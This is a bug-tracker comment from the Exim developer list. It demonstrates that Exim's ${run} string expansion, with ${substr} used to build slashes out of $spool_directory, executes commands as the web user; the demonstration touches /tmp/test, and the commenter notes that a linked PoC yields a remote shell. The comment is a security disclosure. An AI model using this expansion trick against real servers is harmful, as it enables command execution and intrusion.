https://bugs.exim.org/show_bug.cgi?id=2118
--- Comment #2 from Sandor Takacs <[email protected]> --- If you run this as www-data you can create a remote shell to the attacked site as the linked PoC says. I tried it im my FreeBSD box: [[email protected] ~]# ls -l /tmp/test ls: /tmp/test: No such file or directory [[email protected] ~]# sudo -u www sendmail -be '${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch ${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test}}' [[email protected] ~]# ls -l /tmp/test -rw------- 1 www wheel 0 May 5 19:42 /tmp/test [[email protected] ~]# -- You are receiving this mail because: You are on the CC list for the bug. -- ## List details at https://lists.exim.org/mailman/listinfo/exim-dev Exim details at http://www.exim.org/ ##
